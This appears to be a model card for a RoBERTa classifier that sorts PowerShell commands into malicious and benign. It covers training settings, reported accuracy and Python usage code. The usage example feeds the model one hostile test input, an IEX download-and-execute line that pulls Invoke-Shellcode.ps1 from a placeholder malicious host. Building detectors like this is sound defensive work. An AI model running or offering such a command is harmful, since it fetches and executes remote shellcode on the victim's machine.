Duplicate from fetterm4n/finetuned-roberta-powershell-detector


	# neon-roberta-finetuned-powershell-detector

	## ⚡ PowerShell Command Classifier (RoBERTa-base fine-tuned)

	This model is a fine-tuned [RoBERTa-base](https://huggingface.co/roberta-base) model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is malicious (1) or benign (0).

	---

	## 📦 Model Details

	- Base model: `roberta-base`
	- Task: Sequence Classification
	- Classes:
	  - `0`: Benign
	  - `1`: Malicious
	- Dataset: Custom-labeled dataset of real-world PowerShell commands
	- Input format: Raw PowerShell command text (single string)
	- Tokenizer: `roberta-base` tokenizer
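
Because `roberta-base` accepts at most 512 tokens per input (special tokens included), a long script passed as a single string is cut off at that limit when truncation is enabled. The sketch below shows one possible way to cover a long script instead: split its token ids into overlapping windows and classify each window separately. The function name `split_into_windows`, the default `stride` of 128, and the idea of scoring windows independently are assumptions for illustration, not something the model was trained or evaluated with.

```python
from typing import List

MAX_TOKENS = 512      # roberta-base input limit, special tokens included
SPECIAL_TOKENS = 2    # <s> and </s> are added around each window


def split_into_windows(token_ids: List[int],
                       window: int = MAX_TOKENS - SPECIAL_TOKENS,
                       stride: int = 128) -> List[List[int]]:
    """Split token ids into overlapping windows of at most `window` ids.

    Consecutive windows share `stride` ids, so a pattern shorter than
    `stride` that straddles a boundary appears whole in at least one window.
    """
    if window <= 0 or not 0 <= stride < window:
        raise ValueError("need window > 0 and 0 <= stride < window")
    if len(token_ids) <= window:
        return [list(token_ids)]
    step = window - stride
    windows = []
    for start in range(0, len(token_ids), step):
        windows.append(list(token_ids[start:start + window]))
        if start + window >= len(token_ids):
            break  # the last window already reaches the end of the input
    return windows
```

The ids can come from `tokenizer(script, add_special_tokens=False)["input_ids"]`. How to combine per-window predictions (for example, flagging the script if any window is flagged) is a design choice that would need validation against labeled data.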

	---

	## 🏁 Training Details

	- Epochs: 3
	- Batch size: Varied between runs (e.g., 16 or 32, with gradient accumulation)
	- Optimizer: AdamW
	- Learning rate: 2e-5 with linear decay
	- Loss: Cross-entropy
	- Hardware: Fine-tuned on AWS `g5.4xlarge` with A10G GPU
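
To make the learning-rate and batch-size entries above concrete, here is a minimal sketch of a linear-decay schedule and of the effective batch size under gradient accumulation. The card does not state warmup steps, total steps, or accumulation steps, so `warmup_steps=0` and every number in the usage note are assumptions; the function names are hypothetical.

```python
def linear_decay_lr(step: int, total_steps: int,
                    base_lr: float = 2e-5, warmup_steps: int = 0) -> float:
    """Learning rate at `step`: linear warmup, then linear decay to zero."""
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return base_lr * remaining / max(1, total_steps - warmup_steps)


def effective_batch_size(per_device: int, accumulation_steps: int,
                         devices: int = 1) -> int:
    """Number of examples that contribute to each optimizer update."""
    return per_device * accumulation_steps * devices
```

For example, with a hypothetical 1,000 optimizer steps, `linear_decay_lr(500, 1000)` is half the base rate, and `effective_batch_size(16, 2)` gives 32 examples per update.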

	---

	## 📈 Evaluation Results

	| Metric            | Value   |
	|-------------------|---------|
	| Accuracy          | ~98.7%  |
	| Eval Loss         | ~0.089  |
	| Final Train Loss  | ~0.058  |
	| Runtime per Epoch | ~2 mins |
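
The table reports accuracy only. For a detector, precision and recall on the malicious class are often worth checking alongside it, since accuracy can look high when benign samples dominate. The sketch below shows how these could be computed from labels and predictions; `binary_metrics` is a hypothetical helper, and it is not the evaluation code behind the numbers above.

```python
from typing import Dict, Sequence


def binary_metrics(y_true: Sequence[int], y_pred: Sequence[int]) -> Dict[str, float]:
    """Accuracy, precision, recall, and F1, treating label 1 (malicious) as positive."""
    if len(y_true) != len(y_pred):
        raise ValueError("y_true and y_pred must have the same length")
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == 1 and p == 1)
    tn = sum(1 for t, p in pairs if t == 0 and p == 0)
    fp = sum(1 for t, p in pairs if t == 0 and p == 1)
    fn = sum(1 for t, p in pairs if t == 1 and p == 0)
    total = len(pairs)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    return {
        "accuracy": (tp + tn) / total if total else 0.0,
        "precision": precision,
        "recall": recall,
        "f1": f1,
    }
```

Calling it with held-out labels and the model's predictions, e.g. `binary_metrics(labels, predictions)`, returns a dictionary with the four scores.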

	---

	## 🚀 How to Use

	```python
	import torch
	from transformers import AutoModelForSequenceClassification, AutoTokenizer

	# Replace YOUR_USERNAME with the account that hosts this model.
	MODEL_ID = "YOUR_USERNAME/finetuned-roberta-powershell-detector"

	tokenizer = AutoTokenizer.from_pretrained(MODEL_ID)
	model = AutoModelForSequenceClassification.from_pretrained(MODEL_ID)
	model.eval()  # make sure dropout is off for inference

	def classify_powershell(script):
	    """Return "malicious" or "benign" for one PowerShell command or script."""
	    # Inputs longer than the tokenizer's maximum length are truncated.
	    inputs = tokenizer(script, return_tensors="pt", truncation=True, padding=True)
	    with torch.no_grad():  # gradients are not needed for inference
	        outputs = model(**inputs)
	    logits = outputs.logits  # shape: (1, 2), one score per class
	    prediction = torch.argmax(logits, dim=1).item()
	    return "malicious" if prediction == 1 else "benign"

	example = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/Invoke-Shellcode.ps1');"
	print(classify_powershell(example))
	```
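
The example above returns a hard label via `argmax`. When a score is more useful than a label, for instance to tune the trade-off between false positives and missed detections, the two logits can be turned into a probability with a softmax. The following is a minimal sketch in plain Python; the function names and the idea of a tunable `threshold` are assumptions, not part of the published model.

```python
import math
from typing import Sequence


def malicious_probability(logits: Sequence[float]) -> float:
    """Softmax probability of class 1 from a [benign, malicious] logit pair."""
    if len(logits) != 2:
        raise ValueError("expected exactly two logits")
    peak = max(logits)  # subtract the max for numerical stability
    exps = [math.exp(x - peak) for x in logits]
    return exps[1] / sum(exps)


def label_with_threshold(logits: Sequence[float], threshold: float = 0.5) -> str:
    """Label as malicious only if the class-1 probability reaches `threshold`."""
    return "malicious" if malicious_probability(logits) >= threshold else "benign"
```

With the usage example, the logit pair for a single input can be obtained as `outputs.logits[0].tolist()`. A threshold of 0.5 matches the `argmax` decision (ties aside); raising it trades recall for fewer false positives.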

	---

	## 🔍 Intended Use

	This model is meant for PowerShell threat detection and research use in cybersecurity automation pipelines, such as:

	- Security Operations Center (SOC) triage tools
	- Malware analysis and sandboxing systems
	- SIEM/EDR integrations
	- AI-assisted incident response

	---

	## ⚠️ Limitations & Considerations

	- This model is trained on a specific dataset of encoded PowerShell scripts and may not generalize well to obfuscated or novel attack patterns.
	- It should not be used as the sole decision-maker for security classification; it works best as one signal in a larger detection system.
	- May produce false positives for rare or edge-case benign scripts.
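
As an illustration of using the model as one signal among several, the sketch below combines a model score with two other indicators to pick a triage action. Everything here is hypothetical: the `Signals` fields, the `triage` function, the action names, and the thresholds are placeholders that a real deployment would replace with its own rules and tuned values.

```python
from dataclasses import dataclass


@dataclass
class Signals:
    model_score: float                 # probability of the malicious class, 0.0 to 1.0
    signed_by_trusted_publisher: bool  # hypothetical signal from code-signing checks
    matched_known_bad_indicator: bool  # hypothetical signal from a threat-intel match


def triage(signals: Signals, escalate_at: float = 0.9, review_at: float = 0.5) -> str:
    """Return "escalate", "review", or "allow" for one script."""
    if signals.matched_known_bad_indicator:
        return "escalate"  # a hard indicator outweighs the model score
    if signals.model_score >= escalate_at:
        # A trusted signature downgrades the action but does not suppress it.
        return "review" if signals.signed_by_trusted_publisher else "escalate"
    if signals.model_score >= review_at:
        return "review"
    return "allow"
```

Keeping the model score as an input to a rule like this, rather than the final verdict, makes it easier to absorb the false positives and generalization gaps listed above.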

	---

	## 📄 License

	MIT or Apache 2.0 (specify your license)

	---

	## 🙏 Acknowledgements

	- Base model from [RoBERTa (Liu et al., 2019)](https://arxiv.org/abs/1907.11692)
	- Transformers by [Hugging Face](https://huggingface.co/transformers/)